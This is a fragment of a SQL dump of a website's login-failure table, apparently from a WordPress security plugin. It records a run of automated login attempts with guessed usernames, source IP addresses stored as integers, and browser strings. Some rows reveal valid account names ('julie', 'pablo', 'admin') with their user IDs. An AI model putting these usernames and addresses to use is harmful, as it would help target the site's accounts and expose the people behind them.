(102968, 1499267804.859877, 1, 'loginFailInvalidUsername', 'test', 0, 1953905714, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102969, 1499272321.590131, 1, 'loginFailInvalidUsername', 'test', 0, 1836740480, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102970, 1499272322.734130, 1, 'loginFailInvalidUsername', 'test', 0, 1836740480, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102971, 1499274441.794567, 1, 'loginFailInvalidUsername', 'test', 0, 1450921007, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102972, 1499274442.880744, 1, 'loginFailInvalidUsername', 'test', 0, 1450921007, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102973, 1499275902.936555, 1, 'loginFailInvalidUsername', 'test', 0, 2631915670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102974, 1499276999.277692, 1, 'loginFailInvalidUsername', 'test', 0, 762526630, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102975, 1499277000.596993, 1, 'loginFailInvalidUsername', 'test', 0, 762526630, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102976, 1499278197.785928, 1, 'loginFailInvalidUsername', 'training', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102977, 1499278204.218670, 1, 'loginFailInvalidUsername', 'notre', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102978, 1499278209.048969, 1, 'loginFailInvalidUsername', 'pour', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102979, 1499278213.927037, 1, 'loginFailInvalidUsername', 'cross', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102980, 1499278219.947323, 1, 'loginFailInvalidUsername', 'objectifs', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102981, 1499278222.466487, 1, 'loginFailInvalidUsername', 'venez', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102982, 1499278226.474776, 1, 'loginFailInvalidUsername', 'outils', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102983, 1499278231.460150, 1, 'loginFailInvalidUsername', 'professionnel', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102984, 1499278234.891029, 1, 'loginFailInvalidUsername', 'travail', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102985, 1499278239.395744, 1, 'loginFailInvalidUsername', 'namur', 0, 2954879402, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102986, 1499278472.380439, 1, 'loginFailInvalidUsername', 'test', 0, 1329838193, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102987, 1499278473.277611, 1, 'loginFailInvalidUsername', 'test', 0, 1329838193, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102988, 1499278808.089927, 1, 'loginFailInvalidUsername', 'test', 0, 2631371549, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102989, 1499278809.185603, 1, 'loginFailInvalidUsername', 'test', 0, 2631371549, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102990, 1499279369.878585, 1, 'loginFailInvalidUsername', 'test', 0, 1524322520, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102991, 1499279370.837397, 1, 'loginFailInvalidUsername', 'test', 0, 1524322520, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(102992, 1499279619.069371, 1, 'loginFailInvalidUsername', 'center', 0, 1081048870, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102993, 1499280642.169164, 1, 'loginFailInvalidUsername', 'outils', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102994, 1499280645.983448, 1, 'loginFailInvalidUsername', 'professionnel', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102995, 1499280649.997070, 1, 'loginFailInvalidUsername', 'travail', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102996, 1499280652.766121, 1, 'loginFailInvalidUsername', 'namur', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102997, 1499280655.555063, 1, 'loginFailInvalidUsername', 'center', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102998, 1499280658.491340, 1, 'loginFailValidUsername', 'julie', 2, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(102999, 1499280660.978029, 1, 'loginFailValidUsername', 'pablo', 3, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103000, 1499280663.958173, 1, 'loginFailInvalidUsername', 'vous', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103001, 1499280667.075141, 1, 'loginFailInvalidUsername', 'training', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103002, 1499280669.550442, 1, 'loginFailInvalidUsername', 'notre', 0, 3705171747, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103003, 1499280980.072632, 1, 'loginFailInvalidUsername', 'test', 0, 2561250091, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103004, 1499280981.481631, 1, 'loginFailInvalidUsername', 'test', 0, 2561250091, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103005, 1499281973.251296, 1, 'loginFailInvalidUsername', 'pour', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103006, 1499281975.920736, 1, 'loginFailInvalidUsername', 'cross', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103007, 1499281978.649747, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103008, 1499281981.340308, 1, 'loginFailInvalidUsername', 'venez', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103009, 1499281984.027810, 1, 'loginFailInvalidUsername', 'outils', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103010, 1499281986.741367, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103011, 1499281989.758984, 1, 'loginFailInvalidUsername', 'travail', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103012, 1499281992.469519, 1, 'loginFailInvalidUsername', 'namur', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103013, 1499281995.189833, 1, 'loginFailInvalidUsername', 'center', 0, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103014, 1499281997.865923, 1, 'loginFailValidUsername', 'julie', 2, 1732504338, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103015, 1499283034.039647, 1, 'loginFailValidUsername', 'pablo', 3, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103016, 1499283037.176872, 1, 'loginFailInvalidUsername', 'vous', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103017, 1499283040.011642, 1, 'loginFailInvalidUsername', 'training', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103018, 1499283043.141409, 1, 'loginFailInvalidUsername', 'notre', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103019, 1499283045.386447, 1, 'loginFailInvalidUsername', 'pour', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103020, 1499283047.579389, 1, 'loginFailInvalidUsername', 'cross', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103021, 1499283050.483806, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103022, 1499283052.672844, 1, 'loginFailInvalidUsername', 'venez', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103023, 1499283055.201393, 1, 'loginFailInvalidUsername', 'outils', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103024, 1499283057.407662, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1729918482, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103025, 1499283182.495307, 1, 'loginFailValidUsername', 'pablo', 3, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103026, 1499283187.220715, 1, 'loginFailInvalidUsername', 'vous', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103027, 1499283189.986007, 1, 'loginFailInvalidUsername', 'training', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103028, 1499283192.736068, 1, 'loginFailInvalidUsername', 'notre', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103029, 1499283195.415062, 1, 'loginFailInvalidUsername', 'pour', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(103030, 1499283198.267582, 1, 'loginFailInvalidUsername', 'cross', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103031, 1499283200.979033, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103032, 1499283203.777068, 1, 'loginFailInvalidUsername', 'venez', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103033, 1499283206.704944, 1, 'loginFailInvalidUsername', 'outils', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103034, 1499283209.591894, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(103035, 1499287229.058750, 1, 'loginFailInvalidUsername', 'test', 0, 1510259739, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103036, 1499287376.367332, 1, 'loginFailInvalidUsername', 'test', 0, 700942233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103037, 1499288020.994276, 1, 'loginFailInvalidUsername', 'test', 0, 2972363085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103038, 1499288022.291306, 1, 'loginFailInvalidUsername', 'test', 0, 2972363085, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103039, 1499288234.756128, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.86.33 (KHTML, like Gecko) Version/5.2.7 Safari/530.79'),
(103040, 1499289731.550508, 1, 'loginFailInvalidUsername', 'test', 0, 2969840026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103041, 1499289733.126717, 1, 'loginFailInvalidUsername', 'test', 0, 2969840026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103042, 1499291455.966708, 1, 'loginFailInvalidUsername', 'test', 0, 88311441, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103043, 1499291456.958788, 1, 'loginFailInvalidUsername', 'test', 0, 88311441, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103044, 1499297543.454904, 1, 'loginFailInvalidUsername', 'test', 0, 3192026254, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103045, 1499297544.880779, 1, 'loginFailInvalidUsername', 'test', 0, 3192026254, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103046, 1499299063.871731, 1, 'loginFailInvalidUsername', 'test', 0, 2374533419, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103047, 1499299064.847738, 1, 'loginFailInvalidUsername', 'test', 0, 2374533419, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103048, 1499299603.413747, 1, 'loginFailInvalidUsername', 'test', 0, 858038359, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103049, 1499299613.872027, 1, 'loginFailInvalidUsername', 'test', 0, 858038359, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103050, 1499302200.513522, 1, 'loginFailInvalidUsername', 'test', 0, 2904767875, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103051, 1499302201.736681, 1, 'loginFailInvalidUsername', 'test', 0, 2904767875, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103052, 1499304068.881839, 1, 'loginFailInvalidUsername', 'test', 0, 3172807620, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103053, 1499304070.268651, 1, 'loginFailInvalidUsername', 'test', 0, 3172807620, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103054, 1499306271.610093, 1, 'loginFailInvalidUsername', 'test', 0, 3580235251, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103055, 1499306272.806979, 1, 'loginFailInvalidUsername', 'test', 0, 3580235251, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103056, 1499308944.634492, 1, 'loginFailInvalidUsername', 'test', 0, 1460533742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103057, 1499308945.780862, 1, 'loginFailInvalidUsername', 'test', 0, 1460533742, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103058, 1499310346.076637, 1, 'loginFailInvalidUsername', 'test', 0, 737996553, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103059, 1499310347.705253, 1, 'loginFailInvalidUsername', 'test', 0, 737996553, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103060, 1499312322.128448, 1, 'loginFailInvalidUsername', 'test', 0, 755447041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103061, 1499312323.775103, 1, 'loginFailInvalidUsername', 'test', 0, 755447041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103062, 1499312339.559058, 1, 'loginFailInvalidUsername', 'test', 0, 3216740833, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103063, 1499312340.931099, 1, 'loginFailInvalidUsername', 'test', 0, 3216740833, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103064, 1499312391.555267, 1, 'loginFailInvalidUsername', 'test', 0, 3184305740, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103065, 1499312393.198214, 1, 'loginFailInvalidUsername', 'test', 0, 3184305740, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103066, 1499312603.158668, 1, 'loginFailInvalidUsername', 'test', 0, 2081251738, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103067, 1499312605.370637, 1, 'loginFailInvalidUsername', 'test', 0, 2081251738, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103068, 1499314823.011962, 1, 'loginFailInvalidUsername', 'test', 0, 453419362, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103069, 1499315088.664428, 1, 'loginFailInvalidUsername', 'test', 0, 1423703982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103070, 1499315089.626690, 1, 'loginFailInvalidUsername', 'test', 0, 1423703982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103071, 1499316049.712298, 1, 'loginFailInvalidUsername', 'test', 0, 3157639765, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103072, 1499316050.870689, 1, 'loginFailInvalidUsername', 'test', 0, 3157639765, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103073, 1499316663.243748, 1, 'loginFailInvalidUsername', 'test', 0, 3032446933, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103074, 1499323575.101469, 1, 'loginFailInvalidUsername', 'test', 0, 2011893646, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103075, 1499323576.574806, 1, 'loginFailInvalidUsername', 'test', 0, 2011893646, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103076, 1499324049.313042, 1, 'loginFailInvalidUsername', 'test', 0, 1390908880, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103077, 1499324050.594608, 1, 'loginFailInvalidUsername', 'test', 0, 1390908880, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103078, 1499326643.515894, 1, 'loginFailInvalidUsername', 'test', 0, 1391052991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103079, 1499326644.579631, 1, 'loginFailInvalidUsername', 'test', 0, 1391052991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103080, 1499329609.592659, 1, 'loginFailInvalidUsername', 'test', 0, 974136800, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103081, 1499329611.216712, 1, 'loginFailInvalidUsername', 'test', 0, 974136800, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103082, 1499335684.619346, 1, 'loginFailInvalidUsername', 'test', 0, 1844786982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103083, 1499335685.621520, 1, 'loginFailInvalidUsername', 'test', 0, 1844786982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103084, 1499335807.090249, 1, 'loginFailInvalidUsername', 'test', 0, 3149181523, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103085, 1499335808.721678, 1, 'loginFailInvalidUsername', 'test', 0, 3149181523, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103086, 1499336205.187042, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 6.0; WOW64; rv:52.51.04) Gecko/20163937 Firefox/52.51.04'),
(103087, 1499336421.992305, 1, 'loginFailInvalidUsername', 'test', 0, 657556192, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103088, 1499336424.834110, 1, 'loginFailInvalidUsername', 'test', 0, 657556192, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103089, 1499336733.220156, 1, 'loginFailInvalidUsername', 'test', 0, 1504776054, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103090, 1499336734.256387, 1, 'loginFailInvalidUsername', 'test', 0, 1504776054, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103091, 1499337073.816506, 1, 'loginFailInvalidUsername', 'test', 0, 1464964850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103092, 1499337074.798064, 1, 'loginFailInvalidUsername', 'test', 0, 1464964850, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103093, 1499338488.340701, 1, 'loginFailInvalidUsername', 'test', 0, 1449501019, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103094, 1499342412.199812, 1, 'loginFailInvalidUsername', 'test', 0, 1483641245, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103095, 1499342413.330806, 1, 'loginFailInvalidUsername', 'test', 0, 1483641245, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103096, 1499343981.452759, 1, 'loginFailInvalidUsername', 'test', 0, 1744766570, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103097, 1499343983.401918, 1, 'loginFailInvalidUsername', 'test', 0, 1744766570, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103098, 1499346339.861776, 1, 'loginFailInvalidUsername', 'test', 0, 1768331578, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103099, 1499346340.879832, 1, 'loginFailInvalidUsername', 'test', 0, 1768331578, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103100, 1499347184.730024, 1, 'loginFailInvalidUsername', 'test', 0, 3392757914, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103101, 1499347186.275606, 1, 'loginFailInvalidUsername', 'test', 0, 3392757914, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103102, 1499349691.613903, 1, 'loginFailInvalidUsername', 'test', 0, 1856948984, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103103, 1499349693.333458, 1, 'loginFailInvalidUsername', 'test', 0, 1856948984, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103104, 1499349840.226149, 1, 'loginFailInvalidUsername', 'test', 0, 1571327709, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103105, 1499349841.643147, 1, 'loginFailInvalidUsername', 'test', 0, 1571327709, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103106, 1499350051.463550, 1, 'loginFailValidUsername', 'julie', 2, 3470133369, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(103107, 1499352974.912634, 1, 'loginFailInvalidUsername', 'test', 0, 2057571671, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103108, 1499352977.066294, 1, 'loginFailInvalidUsername', 'test', 0, 2057571671, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103109, 1499353043.406428, 1, 'loginFailInvalidUsername', 'test', 0, 1174403878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103110, 1499353044.917583, 1, 'loginFailInvalidUsername', 'test', 0, 1174403878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103111, 1499354867.701495, 1, 'loginFailInvalidUsername', 'test', 0, 1832068382, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103112, 1499354869.129096, 1, 'loginFailInvalidUsername', 'test', 0, 1832068382, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
